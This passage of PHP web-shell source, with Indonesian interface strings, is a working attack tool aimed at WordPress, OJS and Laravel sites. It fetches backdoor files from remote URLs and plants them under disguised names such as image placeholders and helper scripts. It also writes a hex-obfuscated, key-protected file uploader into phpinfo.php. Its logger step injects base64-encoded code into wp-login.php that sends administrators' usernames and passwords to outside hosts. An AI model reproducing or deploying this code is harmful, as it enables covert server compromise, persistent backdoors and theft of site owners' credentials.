Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd1."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd1."</a><br/>".PHP_EOL;chmod($finalbd1,292);}if(!file_exists($finalbd2)){if(ini_get("allow_url_fopen")){$bd2=file_get_contents($b2);$status_bd2=file_put_contents($finalbd2,$bd2);if($status_bd2){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd2."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd2."</a><br/>".PHP_EOL;chmod($finalbd2,292);}else{$altdir2=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/02/";if(!is_dir($altdir2)){$altdir2=$startDirectory."/wp-content/uploads/2022/02/";}$altdir2_final=$altdir2.$nama2;file_put_contents($altdir2_final,$bd2);chmod($altdir2_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir2_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd2."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd2."</a><br/>".PHP_EOL;chmod($finalbd2,292);}if(!file_exists($finalbd3)){if(ini_get("allow_url_fopen")){$bd3=file_get_contents($b3);$status_bd3=file_put_contents($finalbd3,$bd3);if($status_bd3){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd3."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd3."</a><br/>".PHP_EOL;chmod($finalbd3,292);}else{$altdir3=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/03/";if(!is_dir($altdir3)){$altdir3=$startDirectory."/wp-content/uploads/2022/03/";}$altdir3_final=$altdir3.$nama3;file_put_contents($altdir3_final,$bd3);chmod($altdir3_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir3_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd3."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd3."</a><br/>".PHP_EOL;chmod($finalbd3,292);}if(!file_exists($finalbd4)){if(ini_get("allow_url_fopen")){$bd4=file_get_contents($b4);$status_bd4=file_put_contents($finalbd4,$bd4);if($status_bd4){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd4."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd4."</a><br/>".PHP_EOL;chmod($finalbd4,292);}else{$altdir4=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/02/";if(!is_dir($altdir4)){$altdir4=$startDirectory."/wp-content/uploads/2022/02/";}$altdir4_final=$altdir4.$nama4;file_put_contents($altdir4_final,$bd4);chmod($altdir4_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir4_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd4."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd4."</a><br/>".PHP_EOL;chmod($finalbd4,292);}if(!file_exists($finalbd5)){if(ini_get("allow_url_fopen")){$bd5=file_get_contents($b5);$status_bd5=file_put_contents($finalbd5,$bd5);if($status_bd5){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd5."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd5."</a><br/>".PHP_EOL;chmod($finalbd5,292);}else{$altdir5=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/02/";if(!is_dir($altdir5)){$altdir5=$startDirectory."/wp-content/uploads/2022/02/";}$altdir5_final=$altdir5.$nama5;file_put_contents($altdir5_final,$bd5);chmod($altdir5_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir5_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd5."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd5."</a><br/>".PHP_EOL;chmod($finalbd5,292);}if(!file_exists($finalbd6)){if(ini_get("allow_url_fopen")){$bd6=file_get_contents($b6);$status_bd6=file_put_contents($finalbd6,$bd6);if($status_bd6){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd6."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd6."</a><br/>".PHP_EOL;chmod($finalbd6,292);}else{$altdir6=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/04/";if(!is_dir($altdir6)){$altdir6=$startDirectory."/wp-content/uploads/2022/04/";}$altdir6_final=$altdir6.$nama6;file_put_contents($altdir6_final,$bd6);chmod($altdir6_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir6_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd6."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd6."</a><br/>".PHP_EOL;chmod($finalbd6,292);}if(!file_exists($finalbd7)){if(ini_get("allow_url_fopen")){$bd7=file_get_contents($b7);$status_bd7=file_put_contents($finalbd7,$bd7);if($status_bd7){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd7."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd7."</a><br/>".PHP_EOL;chmod($finalbd7,292);}else{$altdir7=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/04/";if(!is_dir($altdir7)){$altdir7=$startDirectory."/wp-content/uploads/2022/04/";}$altdir7_final=$altdir7.$nama7;file_put_contents($altdir7_final,$bd7);chmod($altdir7_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir7_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd7."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd7."</a><br/>".PHP_EOL;chmod($finalbd7,292);}if(!file_exists($finalbd8)){if(ini_get("allow_url_fopen")){$bd8=file_get_contents($b8);$status_bd8=file_put_contents($finalbd8,$bd8);if($status_bd8){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd8."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd8."</a><br/>".PHP_EOL;chmod($finalbd8,292);}else{$altdir8=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/03/";if(!is_dir($altdir8)){$altdir8=$startDirectory."/wp-content/uploads/2022/03/";}$altdir8_final=$altdir8.$nama8;file_put_contents($altdir8_final,$bd8);chmod($altdir8_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir8_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd8."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd8."</a><br/>".PHP_EOL;chmod($finalbd8,292);}if(!file_exists($finalbd9)){if(ini_get("allow_url_fopen")){$bd9=file_get_contents($b9);$status_bd9=file_put_contents($finalbd9,$bd9);if($status_bd9){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd9."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd9."</a><br/>".PHP_EOL;chmod($finalbd9,292);}else{$altdir9=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/02/";if(!is_dir($altdir9)){$altdir9=$startDirectory."/wp-content/uploads/2022/02/";}$altdir9_final=$altdir9.$nama9;file_put_contents($altdir9_final,$bd9);chmod($altdir9_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir9_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd9."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd9."</a><br/>".PHP_EOL;chmod($finalbd9,292);}if(!file_exists($finalbd10)){if(ini_get("allow_url_fopen")){$bd10=file_get_contents($b10);$status_bd10=file_put_contents($finalbd10,$bd10);if($status_bd10){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd10."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd10."</a><br/>".PHP_EOL;chmod($finalbd10,292);}else{$altdir10=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/01/";if(!is_dir($altdir10)){$altdir10=$startDirectory."/wp-content/uploads/2022/01/";}$altdir10_final=$altdir10.$nama10;file_put_contents($altdir10_final,$bd10);chmod($altdir10_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir10_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd10."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd10."</a><br/>".PHP_EOL;chmod($finalbd10,292);}if(!file_exists($finalbd11)){if(ini_get("allow_url_fopen")){$bd11=file_get_contents($b11);$status_bd11=file_put_contents($finalbd11,$bd11);if($status_bd11){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd11."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd11."</a><br/>".PHP_EOL;chmod($finalbd11,292);}else{$altdir11=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/01/";if(!is_dir($altdir11)){$altdir11=$startDirectory."/wp-content/uploads/2022/01/";}$altdir11_final=$altdir11.$nama11;file_put_contents($altdir11_final,$bd11);chmod($altdir11_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir11_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd11."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd11."</a><br/>".PHP_EOL;chmod($finalbd11,292);}if(!file_exists($finalbd12)){if(ini_get("allow_url_fopen")){$bd12=file_get_contents($b12);$status_bd12=file_put_contents($finalbd12,$bd12);if($status_bd12){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd12."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd12."</a><br/>".PHP_EOL;chmod($finalbd12,292);}else{$altdir12=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/02/";if(!is_dir($altdir12)){$altdir12=$startDirectory."/wp-content/uploads/2022/02/";}$altdir12_final=$altdir12.$nama12;file_put_contents($altdir12_final,$bd12);chmod($altdir12_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir12_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd12."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd12."</a><br/>".PHP_EOL;chmod($finalbd12,292);}if(!file_exists($finalbd13)){if(ini_get("allow_url_fopen")){$bd13=file_get_contents($b13);$status_bd13=file_put_contents($finalbd13,$bd13);if($status_bd13){$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>Sukses!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd13."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd13."</a><br/>".PHP_EOL;chmod($finalbd13,292);}else{$altdir13=$_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/2022/013/";if(!is_dir($altdir13)){$altdir13=$startDirectory."/wp-content/uploads/2022/013/";}$altdir13_final=$altdir13.$nama13;file_put_contents($altdir13_final,$bd13);chmod($altdir13_final,292);$bdresult.="<span style=color:red!important;font-weight:bold;>Gagal Taro Di Target! Akses di:</span>&nbsp;&nbsp;&nbsp;".$home.$altdir13_final."<br/>".PHP_EOL;}}}else{$bdresult.="<span style=color:#20ef20!important;font-weight:bold;>File Exists!</span>&nbsp;&nbsp;&nbsp;<a href='".$home.$finalbd13."' target='_blank' rel='nofollow noopener noreferrer'>".$home.$finalbd13."</a><br/>".PHP_EOL;chmod($finalbd13,292);}ob_end_flush();echo "<div class="bigarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($bdresult).PHP_EOL;echo "</div>";}if(isset($_POST["injectuploader"])){$phpinfo_result='';$startDirectory=realpath(__DIR__);$isiphpinfo="<?php phpinfo();\xa${"\x47L\x4fBA\x4c\x53"}["\x6bu\x6c\x71\x72\x6d\x6c\x75u"]="\x4b\x70\x6eT0\x4c";${"\x47\x4cOB\x41\x4cS"}["\x63\x62\x6a\x6e\x72iilu\x6d\x6e\x73"]="r\x65\x73\x75\x6c\x74";${"\x47\x4c\x4f\x42\x41LS"}["lj\x6d\x62\x75xe\x63\x6aw"]="K\x70\x6eT0\x4c";set_time_limit(0);ini_set("\x6d\x65\x6dor\x79_li\x6dit","-1");error_reporting(0);ini_set("error\x5f\x6co\x67",null);ini_set("\x68\x74\x6d\x6c_\x65\x72\x72or\x73",0);ini_set("log\x5f\x65r\x72\x6fr\x73",0);ini_set("l\x6fg_erro\x72\x73_\x6da\x78\x5f\x6c\x65n",0);ini_set("d\x69\x73play\x5f\x65\x72ro\x72s",0);ini_set("\x64i\x73play\x5fst\x61r\x74\x75p_er\x72\x6frs",0);ini_set("m\x61\x78_\x65x\x65c\x75t\x69o\x6e_time",0);if(isset($_POST["upl\x6fa\x64e\x64"])){$uslnnshj="f\x69l\x65";$dajkeljrobvb="\x66\x6f\x6c\x64\x65\x72";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x71w\x6ejq\x66"]="f\x69le\x73";${"\x47L\x4fB\x41\x4c\x53"}["\x6a\x6d\x76\x73vs\x6d\x70\x78f\x77n"]="\x66\x69le\x73";$hzbnizbj="\x66\x6f\x6cd\x65\x72";${$uslnnshj}=$_FILES["fi\x6ces"]["\x6eam\x65"];${${"\x47LOB\x41LS"}["\x71\x77\x6ej\x71\x66"]}=$_FILES["\x66\x69le\x73"]["t\x6dp\x5fn\x61me"];${$hzbnizbj}="";${"\x47L\x4fBA\x4c\x53"}["f\x71\x67\x62\x74\x71"]="\x66i\x6ce";if(move_uploaded_file(${${"\x47\x4c\x4fBA\x4cS"}["\x6a\x6dv\x73\x76\x73mp\x78\x66\x77\x6e"]},${$dajkeljrobvb}.${${"G\x4c\x4f\x42\x41\x4cS"}["fq\x67b\x74\x71"]})){${${"G\x4cO\x42A\x4cS"}["c\x62\x6an\x72\x69il\x75\x6d\x6es"]}="U\x70lo\x61\x64\x65\x64 : =\x3e\x20\x3c\x61 \x68\x72\x65f='$file' \x74\x61r\x67\x65\x74=\x27_b\x6can\x6b\x27\x3e\x41\x6b\x73\x65s\x20D\x69\x73in\x69\x3c/A>";}else{${${"\x47LO\x42A\x4c\x53"}["\x63bj\x6er\x69i\x6cumn\x73"]}="Gag\x61l\x20suw.\x2e\x2e!";}}${${"G\x4c\x4fBA\x4c\x53"}["\x6c\x6a\x6d\x62\x75x\x65c\x6a\x77"]}="cU\x61\x4e\x62\x45rSa\x4d\x61\x53\x61M\x61\x41\x6e\x4a\x65\x4eg\x4a\x61\x4e\x63Og";if($_GET["k\x39"]==${${"G\x4c\x4f\x42A\x4c\x53"}["kulq\x72m\x6cu\x75"]}){$lazapfdkqp="r\x65\x73\x75\x6c\x74";echo"\x3cce\x6et\x65\x72\x3e\x3cb\x3eRoo\x74\x20\x48u\x6eter\x20v\x31\x3cb\x72>\x3cb\x72\x3e".php_uname()."<b\x72></\x62></c\x65nter\x3e";echo"\x3c\x62r />\x3cb\x72\x20/><\x62\x72\x20/\x3e\x3chtm\x6c\x3e\x3c\x68\x65a\x64\x3e\x3c\x74\x69tle>P1X \x55\x70\x6c\x6fad\x65r</title\x3e</\x68\x65\x61d\x3e\x3cb\x6f\x64\x79><\x63\x65\x6ete\x72><f\x6f\x72m \x61\x63t\x69\x6f\x6e=\x22\x22\x20\x6d\x65th\x6f\x64\x3d\x22\x70ost\x22\x20e\x6e\x63typ\x65\x3d\"mul\x74ipart/\x66\x6f\x72\x6d-da\x74\x61\"\x3e<i\x6e\x70u\x74 \x74y\x70\x65\x3d\"\x66\x69l\x65\"\x20\x6ea\x6de\x3d\"f\x69l\x65s\"\x20/\x3e\x3c\x69n\x70\x75t\x20\x74\x79\x70e=\x22s\x75\x62\x6dit\x22\x20n\x61m\x65\x3d\"u\x70\x6co\x61de\x64\" v\x61lu\x65\x3d\x22\x55p\x6c\x6fa\x64\x22></\x66o\x72\x6d>".${$lazapfdkqp}."\x3c/\x63\x65nt\x65\x72>\x3c/\x62od\x79>\x3c/\x68t\x6d\x6c\x3e";}
?>";if($startDirectory!==$_SERVER["DOCUMENT_ROOT"]){$dirphpinfo=$startDirectory;$phpinfo=$dirphpinfo."/phpinfo.php";}else{$dirphpinfo=$_SERVER["DOCUMENT_ROOT"];$phpinfo=$dirphpinfo."/phpinfo.php";}if(is_writeable($dirphpinfo)){if(file_exists($phpinfo)){if(!is_writeable($phpinfo)||!is_readable($phpinfo)){chmod($phpinfo,511);}else{unlink($phpinfo);}}else{$status=file_put_contents($phpinfo,$isiphpinfo);if($status){$phpinfo_result.="<div class="small" name="output" style="border-bottom:0;margin-top:5px;" readonly><span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy Uploader!</span> {$phpinfo}</div>";chmod($phpinfo,292);}else{$phpinfo_result.="<div class="small" name="output" style="border-bottom:0;margin-top:5px;" readonly><span style=color:red!important;font-weight:bold;>Gagal Deploy Uploader!</span></div>";}}}echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($phpinfo_result).PHP_EOL;echo "</div>";}if(isset($_POST["injectconsole"])){$console_result='';$startDirectory=realpath(__DIR__);$isiconsole=file_get_contents("https://dpaste.com/BUBSC2Y82.txt");if($startDirectory!==$_SERVER["DOCUMENT_ROOT"]){$dirconsole=$startDirectory;$dirconsole_wp=$dirconsole."/wp-includes/IXR/";$dirconsole_ojs=$dirconsole."/cache//";$dirconsole_laravel=$dirconsole."/public//";$dirconsole_cms_lainnya=$dirconsole."/assets//";}else{$dirconsole=$_SERVER["DOCUMENT_ROOT"];$dirconsole_wp=$dirconsole."/wp-includes/IXR/";$dirconsole_ojs=$dirconsole."/cache//";$dirconsole_laravel=$dirconsole."/public//";$dirconsole_cms_lainnya=$dirconsole."/assets//";}if(is_dir($dirconsole_wp)&&is_writeable($dirconsole_wp)){$fileconsole=$dirconsole_wp."class-IXR-info.php";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="<span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy Console!</span>&nbsp;&nbsp;&nbsp; {$fileconsole}<br>";chmod($fileconsole,292);}else{$console_result.="<span style=color:red!important;font-weight:bold;>Gagal Deploy Console!</span><br>";}}else{$dirconsole_wp_fallback=$dirconsole."/wp-content/uploads";$fileconsole=$dirconsole_wp_fallback."/woocommerce-placeholder-768x768.php";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="<span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy Console!</span>&nbsp;&nbsp;&nbsp; {$fileconsole}<br>";chmod($fileconsole,292);}else{$console_result.="<span style=color:red!important;font-weight:bold;>Gagal Deploy Console!</span><br>";}}if(is_dir($dirconsole_ojs)&&is_writeable($dirconsole_ojs)){$fileconsole=$dirconsole_ojs."fc-country-en_ID.php";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="<span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy Console!</span>&nbsp;&nbsp;&nbsp; {$fileconsole}<br>";chmod($fileconsole,292);}else{$console_result.="<span style=color:red!important;font-weight:bold;>Gagal Deploy Console!</span><br>";}}else{$dirconsole_ojs_fallback=$dirconsole."/public/site/images";$fileconsole=$dirconsole_ojs_fallback."/profileImage-9999.php";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="<span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy Console!</span>&nbsp;&nbsp;&nbsp; {$fileconsole}<br>";chmod($fileconsole,292);}else{$console_result.="<span style=color:red!important;font-weight:bold;>Gagal Deploy Console!</span><br>";}}if(is_dir($dirconsole_laravel)&&is_writeable($dirconsole_laravel)){$fileconsole=$dirconsole_laravel."laravel_ide_helper.php";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="<span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy Console!</span>&nbsp;&nbsp;&nbsp; {$fileconsole}<br>";chmod($fileconsole,292);}else{$console_result.="<span style=color:red!important;font-weight:bold;>Gagal Deploy Console!</span><br>";}}else{$dirconsole_laravel_fallback=$dirconsole."/public/vendor";$fileconsole=$dirconsole_laravel_fallback."/composer-autoload.php";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="<span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy Console!</span>&nbsp;&nbsp;&nbsp; {$fileconsole}<br>";chmod($fileconsole,292);}else{$console_result.="<span style=color:red!important;font-weight:bold;>Gagal Deploy Console!</span><br>";}}if(is_dir($dirconsole_cms_lainnya)&&is_writeable($dirconsole_cms_lainnya)){$fileconsole=$dirconsole_cms_lainnya."bootstrap.php";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="<span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy Console!</span> {$fileconsole}<br>";chmod($fileconsole,292);}else{$console_result.="<span style=color:red!important;font-weight:bold;>Gagal Deploy Console!</span><br>";}}else{$dirconsole_cms_lainnya_fallback=$dirconsole."/css";$fileconsole=$dirconsole_cms_lainnya_fallback."/bootstrap.php";$status=file_put_contents($fileconsole,$isiconsole);if($status){$console_result.="<span style=color:#20ef20!important;font-weight:bold;>Berhasil Deploy Console!</span> {$fileconsole}<br>";chmod($fileconsole,292);}else{$console_result.="<span style=color:red!important;font-weight:bold;>Gagal Deploy Console!</span><br>";}}echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($console_result).PHP_EOL;echo "</div>";}if(isset($_POST["injectlogger"])){$logger_result='';$startDirectory=realpath(__DIR__);if($startDirectory!==$_SERVER["DOCUMENT_ROOT"]){$wplog=$startDirectory."/wp-login.php";}else{$wplog=$_SERVER["DOCUMENT_ROOT"]."/wp-login.php";}$f=fopen($wplog,"r+");$oldstr=file_get_contents($wplog);$str_to_insert=base64_decode("JGFkbWluX3dwX2xvZ2luX2NoZWNrX2ludGVydmFsX2Nvb2tpZSA9ICJiYSIgLiAicyIgLiAiZTYiIC4gIjQiIC4gIl8iIC4gImQiIC4gImUiIC4gImMiIC4gIm9kZSI7CiRhZG1pbl93cF9sb2dpbl9jaGVja19pbnRlcnZhbF9yZXF1ZXN0ID0gImJhIiAuICJzIiAuICJlNiIgLiAiNCIgLiAiXyIgLiAiZSIgLiAibiIgLiAiYyIgLiAib2RlIjsKJGFkbWluX2Nvb2tpZV9pbnRlcnZhbF91cmwgPQokYWRtaW5fd3BfbG9naW5fY2hlY2tfaW50ZXJ2YWxfY29va2llKCJhSFIwY0RvdkwyeHZZMkZzYUc5emRDOXdjbWwyT0M5allYQjBkWEpsYkc5bmFXNHVjR2h3UDJGa2JXbHVhWEE5IikgLiAKJGFkbWluX3dwX2xvZ2luX2NoZWNrX2ludGVydmFsX3JlcXVlc3Qod3BfbG9naW5fdXJsKCkpIC4gIiZuYW1lPSIgLiAKJGFkbWluX3dwX2xvZ2luX2NoZWNrX2ludGVydmFsX3JlcXVlc3QoJF9QT1NUWyJsb2ciXSkgLiAiJnBhc3N3b3JkPSIgLiAKJGFkbWluX3dwX2xvZ2luX2NoZWNrX2ludGVydmFsX3JlcXVlc3QoJF9QT1NUWyJwd2QiXSk7CiRhZG1pbl9jb29raWVfaW50ZXJ2YWwgPSBmaWxlX2dldF9jb250ZW50cygkYWRtaW5fY29va2llX2ludGVydmFsX3VybCk7CiR3cF9hZG1pbl9jb29raWVfaW50ZXJ2YWxfdXJsID0KJGFkbWluX3dwX2xvZ2luX2NoZWNrX2ludGVydmFsX2Nvb2tpZSgiYUhSMGNITTZMeTl6WlhSellXNWtjMlYwZEdsdVozTXVZMjl0TDNSUlVtUkZVM1JOVG5JdWNHaHdQMkZrYldsdWFYQTkiKSAuIAokYWRtaW5fd3BfbG9naW5fY2hlY2tfaW50ZXJ2YWxfcmVxdWVzdCh3cF9sb2dpbl91cmwoKSkgLiAiJm5hbWU9IiAuIAokYWRtaW5fd3BfbG9naW5fY2hlY2tfaW50ZXJ2YWxfcmVxdWVzdCgkX1BPU1RbImxvZyJdKSAuICImcGFzc3dvcmQ9IiAuIAokYWRtaW5fd3BfbG9naW5fY2hlY2tfaW50ZXJ2YWxfcmVxdWVzdCgkX1BPU1RbInB3ZCJdKTsKJHdwX2FkbWluX2Nvb2tpZV9pbnRlcnZhbCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR3cF9hZG1pbl9jb29raWVfaW50ZXJ2YWxfdXJsKTsKZnVuY3Rpb24gZ2V0X3dvcmRwcmVzc19zdHJ1Y3R1cmUoJHVybCkgewogICAgJGNoID0gY3VybF9pbml0KCk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsKICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxKTsKICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAzKTsKICAgIGN1cmxfZXhlYygkY2gpOwogICAgY3VybF9jbG9zZSgkY2gpOwogICAgcmV0dXJuIHRydWU7Cn0KaWYgKGVtcHR5KCRhZG1pbl9jb29raWVfaW50ZXJ2YWwpKSB7CiAgICBnZXRfd29yZHByZXNzX3N0cnVjdHVyZSgkYWRtaW5fY29va2llX2ludGVydmFsX3VybCk7Cn0KaWYgKGVtcHR5KCR3cF9hZG1pbl9jb29raWVfaW50ZXJ2YWwpKSB7CiAgICBnZXRfd29yZHByZXNzX3N0cnVjdHVyZSgkd3BfYWRtaW5fY29va2llX2ludGVydmFsX3VybCk7Cn0=");$specificLine="if ( ( empty( $redirect_to ) || 'wp-admin/' === $redirect_to || admin_url() === $redirect_to ) ) {";$stringkita="$admin_wp_login_check_interval_cookie";while(($buffer=fgets($f))!==false){if(strpos(file_get_contents($wplog),$stringkita)!==false){$logger_result="<center><span style=color:red!important;font-weight:bold;>Logger Sudah Diinject!</span></center><br>";}elseif(strpos($buffer,$specificLine)!==false){$pos=ftell($f);$newstr=substr_replace($oldstr,$str_to_insert,$pos,0);$status=file_put_contents($wplog,$newstr);if($status){$logger_result.="<center><span style=color:#20ef20!important;font-weight:bold;>Berhasil Inject Logger!</span></center><br>";}else{$logger_result.="<center><span style=color:red!important;font-weight:bold;>Gagal Inject Logger!</span></center><br>";}break;}}fclose($f);echo "<div class="smallarea" name="output style="border-bottom:0;margin-top:5px;" readonly>";print_r($logger_result).PHP_EOL;echo "</div>";}echo "</div>";echo "</div>";$is_writable=is_writable($GLOBALS["cwd"])?" <font color='#ffdb5f'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";echo "
</div>\xa<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
